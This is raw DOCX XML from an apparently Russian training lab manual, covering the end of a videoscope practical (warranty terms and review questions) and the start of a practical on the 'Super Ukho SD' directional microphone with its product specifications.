        <w:t xml:space="preserve"> гарантирует своим заказчикам, что данное устройство не будет содержать дефектов материалов и изготовления в течение 1 (одного) года с даты первоначальной покупки при соблюдении следующих условий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Ответственность компании Autel в рамках гарантии ограничивается исключительно бесплатным ремонтом или заменой прибора при наличии доказательства покупки. Для этой цели можно использовать кассовый</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>чек.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Данная гарантия не распространяется на повреждения, возникающие вследствие ненадлежащего использования, несчастных случаев, наводнений, разрядов молний, а также после модификаций или ремонта за пределами сервисного центра производителя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Компания Autel не несет ответственности за любые случайные или косвенные повреждения, возникающие в следствие использования, неправильного использования или монтажа</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>прибора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Вся информация, содержащаяся в данном руководстве, была актуальной на момент публикации, однако точность и полнота информации не гарантируются. Компания Autel оставляет за собой право в любое время без предварительного уведомления вносить изменения в свое оборудование и документацию к</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>нему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_bookmark29"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервисные</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>процедуры</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При наличии каких-либо вопросов обратитесь к местному представителю или дистрибьютору компании </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Autel</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, а также посетите веб-сайт </w:t>
      </w:r>
      <w:hyperlink r:id="rId85">
        <w:r w:rsidRPr="002F75CB">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="002F75CB">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="ru-RU"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="002F75CB">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>auteltech</w:t>
        </w:r>
        <w:r w:rsidRPr="002F75CB">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="ru-RU"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="002F75CB">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
        <w:r w:rsidRPr="002F75CB">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="ru-RU"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В случае необходимости возврата прибора для проведения ремонта, обратитесь к местному дистрибьютору, чтобы получить дополнительную информацию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00AD158C" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Контрольные вопросы для защиты практической работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00AD158C" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD158C">
        <w:t>Из чего состоит Видеоскоп MaxiVideo™ MV208?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00AD158C" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD158C">
        <w:t>Как происходит подсоединение зонда и видеоголовки?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00AD158C" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD158C">
        <w:t>Какие основные операции вы знаете?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD712C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc3808627"/>
      <w:r>
        <w:t>Вопросы для защиты  работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 1. Маскировка звуковых сигналов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 2. Понятность и разборчивость речи; (П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1578"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc508055969"/>
      <w:bookmarkStart w:id="86" w:name="_Toc3808628"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
        </w:rPr>
        <w:t>рактическая работа №14</w:t>
      </w:r>
      <w:bookmarkStart w:id="87" w:name="_Toc508055970"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Микрофон усиливающий «Супер Ухо SD»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="003662D2" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="003662D2" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A275E4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A275E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исследовать свойства и применение микрофона «Супер Ухо SD»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A275E4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A275E4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Микрофон направленного действия Супер Ухо SD предназначен для прослушивания и записи удаленных звуков, расположенных в зоне прямой видимости. Параболическая антенна для концентрации звуков имеет усиление до 70 дБ – это означает, что Вы сможете услышать негромкие звуки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>на расстоянии до 50-100 метров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Микрофон оснащен встроенным моноклем с 8-кратным увеличением изображения, чтобы было легче выбрать объект наблюдения и разглядеть все его детали.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Отличительной особенностью данного микрофона является встроенный диктофон с записью на SD карту памяти. Таким образом, Вы сможете записать все улавливаемые звуки в цифровом формате на карту памяти</w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>до 2 Гб, что позволяет вести до 10 часов записи. Прослушивание записей возможно на самом устройстве – для этого есть кнопки воспроизведения и выбора записанного трека. </w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Питание направленного микрофона Супер Ухо SD осуществляется от батарейки 9В типа Крона и позволяет проработать устройству от одной батарейки до 60 часов.</w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Направленный микрофон Супер Ухо SD прежде всего будет интересен при наблюдении за жизнью дикой природы. Особенно прибор заинтересует юных натуралистов при наблюдении за птицами и другими животными. Направленный микрофон часто входит в стандартную экипировку охотника для отслеживания передвижения животных.</w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
        <w:t>Усиление звуков на расстоянии до 50-100 метров в прямой видимости позволяет услышать даже тихое пение птиц.</w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
        <w:t>Оптическая система с 8-кратным увеличением позволит более точно навести микрофон и в деталях рассмотреть объект наблюдения.</w:t>
      </w:r>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
        <w:t>До 60 часов автономной работы обеспечит долгое использование микр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>офона от одной батарейки Крона.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="003662D2" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Качественные накладные наушники с мягкими подушечками для шумоизоляции позволят услышать любой даже самый тихий звук.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="003662D2" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003662D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Технические характеристики:</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Расстояние улавливания звуков: до 50-100 метров</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Усиление: до 70 дБ</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Угол направленности: 10 градусов</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Диапазон частот: 100 -14000 Гц</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Тип карты памяти: SD до 2 Гб</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lastRenderedPageBreak/>
        <w:t>Время записи: до 10 часов</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Питание: 9В, Крона</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Время автономной работы: до 60 часов</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Температурный режим: от 0 до + 55 С</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Максимальная влажность: до 95% при температуре 20 гр.С.</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Размеры: 290 х 150 х 90 мм</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007075A6"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Вес: 1200 грамм</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007075A6" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Инструкция по применению устройства:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
